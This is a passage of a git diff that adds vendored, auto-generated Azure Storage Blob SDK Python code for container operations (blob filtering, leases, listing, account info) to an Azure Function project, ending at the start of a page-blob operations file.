+     limit that is recorded in the analytics logs when storage analytics logging is enabled. Default
+     value is None.
+    :type request_id_parameter: str
+    :param where: Filters the results to return only blobs whose tags match the specified
+     expression. Default value is None.
+    :type where: str
+    :param marker: A string value that identifies the portion of the list of blobs to be returned
+     with the next listing operation. The operation returns the NextMarker value within the
+     response body if the listing operation did not return all blobs remaining to be listed with
+     the current page. The NextMarker value can be used as the value for the marker parameter in a
+     subsequent call to request the next page of list items. The marker value is opaque to the
+     client. Default value is None.
+    :type marker: str
+    :param maxresults: Specifies the maximum number of blobs to return. If the request does not
+     specify maxresults, or specifies a value greater than 5000, the server will return up to 5000
+     items. Note that if the listing operation crosses a partition boundary, then the service will
+     return a continuation token for retrieving the remainder of the results. For this reason, it
+     is possible that the service will return fewer results than specified by maxresults, or than
+     the default of 5000. Default value is None.
+    :type maxresults: int
+    :keyword restype: restype. Default value is "container". Note that overriding this default
+     value may result in unsupported behavior.
+    :paramtype restype: str
+    :keyword comp: comp. Default value is "blobs". Note that overriding this default value may
+     result in unsupported behavior.
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: FilterBlobSegment, or the result of cls(response) + :rtype: ~azure.storage.blob.models.FilterBlobSegment + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.FilterBlobSegment"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "blobs") # type: str + + + request = build_filter_blobs_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + where=where, + marker=marker, + maxresults=maxresults, + template_url=self.filter_blobs.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('FilterBlobSegment', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + filter_blobs.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def acquire_lease( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + duration=None, # type: Optional[int] + proposed_lease_id=None, # type: Optional[str] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param duration: Specifies the duration of the lease, in seconds, or negative one (-1) for a + lease that never expires. A non-infinite lease can be between 15 and 60 seconds. A lease + duration cannot be changed using renew or change. Default value is None. + :type duration: int + :param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid + Constructor (String) for a list of valid GUID string formats. Default value is None. 
+ :type proposed_lease_id: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "acquire". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "acquire") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_acquire_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + timeout=timeout, + duration=duration, + proposed_lease_id=proposed_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.acquire_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + acquire_lease.metadata = {'url': 
"{url}/{containerName}"} # type: ignore + + + @distributed_trace + def release_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id, # type: str + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "release". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "release") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_release_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + lease_id=lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.release_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + 
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + release_lease.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def renew_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id, # type: str + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "renew". Note that + overriding this default value may result in unsupported behavior. 
+ :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "renew") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_renew_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + lease_id=lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.renew_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + renew_lease.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def break_lease( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + break_period=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param break_period: For a break operation, proposed duration the lease should continue before + it is broken, in seconds, between 0 and 60. 
This break period is only used if it is shorter + than the time remaining on the lease. If longer, the time remaining on the lease is used. A new + lease will not be available before the break period has expired, but the lease may be held for + longer than the break period. If this header does not appear with a break operation, a + fixed-duration lease breaks after the remaining lease period elapses, and an infinite lease + breaks immediately. Default value is None. + :type break_period: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "break". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "break") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_break_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + timeout=timeout, + break_period=break_period, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.break_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-time']=self._deserialize('int', response.headers.get('x-ms-lease-time')) + response_headers['x-ms-client-request-id']=self._deserialize('str', 
response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + break_lease.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def change_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id, # type: str + proposed_lease_id, # type: str + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid + Constructor (String) for a list of valid GUID string formats. + :type proposed_lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "change". Note that + overriding this default value may result in unsupported behavior. 
+ :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "change") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_change_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + lease_id=lease_id, + proposed_lease_id=proposed_lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.change_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + change_lease.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def list_blob_flat_segment( + self, + prefix=None, # type: Optional[str] + marker=None, # type: Optional[str] + maxresults=None, # type: Optional[int] + include=None, # type: Optional[List[Union[str, "_models.ListBlobsIncludeItem"]]] + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> "_models.ListBlobsFlatSegmentResponse" + """[Update] The List Blobs operation returns a list of the blobs under the specified container. + + :param prefix: Filters the results to return only containers whose name begins with the + specified prefix. Default value is None. + :type prefix: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. 
The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :param include: Include this parameter to specify one or more datasets to include in the + response. Default value is None. + :type include: list[str or ~azure.storage.blob.models.ListBlobsIncludeItem] + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "list". Note that overriding this default value may + result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: ListBlobsFlatSegmentResponse, or the result of cls(response) + :rtype: ~azure.storage.blob.models.ListBlobsFlatSegmentResponse + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.ListBlobsFlatSegmentResponse"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "list") # type: str + + + request = build_list_blob_flat_segment_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + prefix=prefix, + marker=marker, + maxresults=maxresults, + include=include, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.list_blob_flat_segment.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('ListBlobsFlatSegmentResponse', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + list_blob_flat_segment.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def list_blob_hierarchy_segment( + self, + delimiter, # type: str + prefix=None, # type: Optional[str] + marker=None, # type: Optional[str] + maxresults=None, # type: Optional[int] + include=None, # type: Optional[List[Union[str, "_models.ListBlobsIncludeItem"]]] + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> "_models.ListBlobsHierarchySegmentResponse" + """[Update] The List Blobs operation returns a list of the blobs under the specified container. + + :param delimiter: When the request includes this parameter, the operation returns a BlobPrefix + element in the response body that acts as a placeholder for all blobs whose names begin with + the same substring up to the appearance of the delimiter character. The delimiter may be a + single character or a string. + :type delimiter: str + :param prefix: Filters the results to return only containers whose name begins with the + specified prefix. Default value is None. 
+ :type prefix: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :param include: Include this parameter to specify one or more datasets to include in the + response. Default value is None. + :type include: list[str or ~azure.storage.blob.models.ListBlobsIncludeItem] + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "list". Note that overriding this default value may + result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: ListBlobsHierarchySegmentResponse, or the result of cls(response) + :rtype: ~azure.storage.blob.models.ListBlobsHierarchySegmentResponse + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.ListBlobsHierarchySegmentResponse"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "list") # type: str + + + request = build_list_blob_hierarchy_segment_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + delimiter=delimiter, + prefix=prefix, + marker=marker, + maxresults=maxresults, + include=include, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.list_blob_hierarchy_segment.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('ListBlobsHierarchySegmentResponse', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + list_blob_hierarchy_segment.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def get_account_info( # pylint: disable=inconsistent-return-statements + self, + **kwargs # type: Any + ): + # type: (...) -> None + """Returns the sku name and account kind. + + :keyword restype: restype. Default value is "account". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "account") # type: str + comp = kwargs.pop('comp', "properties") # type: str + + + request = build_get_account_info_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + template_url=self.get_account_info.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-sku-name']=self._deserialize('str', response.headers.get('x-ms-sku-name')) + response_headers['x-ms-account-kind']=self._deserialize('str', response.headers.get('x-ms-account-kind')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_account_info.metadata = {'url': "{url}/{containerName}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_page_blob_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_page_blob_operations.py new file mode 100644 index 0000000..772653a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_page_blob_operations.py @@ -0,0 +1,2166 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. 
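+#
+# The request builders below back the page-blob methods on the public
+# ``BlobClient``. A minimal, hypothetical sketch of the call path that reaches
+# build_create_request (``conn_str`` and the container/blob names are
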